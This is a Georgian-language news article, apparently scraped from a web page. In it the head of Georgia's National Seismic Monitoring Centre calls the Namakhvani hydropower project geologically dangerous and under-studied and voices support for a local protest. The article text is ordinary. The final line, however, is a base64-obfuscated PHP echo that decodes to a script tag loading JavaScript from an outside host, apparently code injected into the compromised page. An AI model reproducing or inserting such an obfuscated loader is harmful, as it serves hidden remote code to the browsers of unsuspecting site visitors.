gorgia
ავერსი jaluzi
სეიმური მონიტორინგის ეროვნული ცენტრის დირექტორი თეა გოდოლაძის განცხადებით, “ნამახვანჰესის”პროექტი გეოლოგიურად საშიში და სახიფათოა. 
 
როგორც გოდოლაძემ საინფორმაციო სააგენტო BUSINESS TIME-ს განუმარტა, პროექტის შესწავლას მსგავსი ნაგებობის ასაშენებლად წლები ჭირდება და არა ერთი წელი.
 
“საშიშია ეს პროექტი, საშიში და სახიფათოა, პროექტი არ არის შესწავლი, არც მაშინ იყო, ორი წლის წინ როცა წინასწარი სამუშაოებისთვის გაიცა ნებართვა. ახლა კი დაიწყეს მუშაობა და კვლევებს გზაში აწევენ. ჯერ გაყიდეს პროექტი და ახლა იკვლევენ. ამ დონის  ნაგებობის პროექტის შესწავლას ერთი კი არა ათი წელი სჭირდება. ასეთი ცუდი და მოუმზადებელი პროექტის მიუხედავად, გაჩაღებულია სამუშაოები და ხეობაში ადგილობრივებს არ უშვებენ. როდესაც ჩავიხედეთ პროექტში სპეციალისტებმა და გეოლოგებმა ვნახეთ, რომ პროექტის ავტორს არ აქვს გაცნობიერებული რა რეგიონში მოდის - სად მოდის და რას აკეთებს საერთოდ?! ერთია რომ კვლევები არ არის ჩატარებული და მეორე ის რომ არსებული მასალის ანალიზიც არ არის იმაზე, თუ რა არის დასამატებელი, რა არის გაკეთებული და რა არის გასაკეთებელი ან რატოა ეს ყველაფერი საშიში და სახიფათო?!”, - განაცხადა გოდოლაძემ. 
 
მისივე თქმით, ეს პროექტი ნიშნავს იმას, რომ “ნელი მოქმედების ნაღმს ვდებთ რეგიონში”, იმის ხარჯზე რომ გარემოს ვანადგურებთ. 
 
“ასეთ რისკზე როცა მიდის სახელმწიფო, ფაქტობრივად არც იცის სახელმწიფომ და გააზრებულიც არა აქვს, ანუ გადაწყვეტილების მიმღები მაპატიეთ და  აზრზე არ არის პრობლემის არსის შესახებ. მე ვუერთდები ხვალინდელ აქციას, ის ჩემი ხეობაა და მხარს ვუჭერ ამ ადამიანებს”, - განაცხადა გოდოლაძემ.
 
 
1616
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");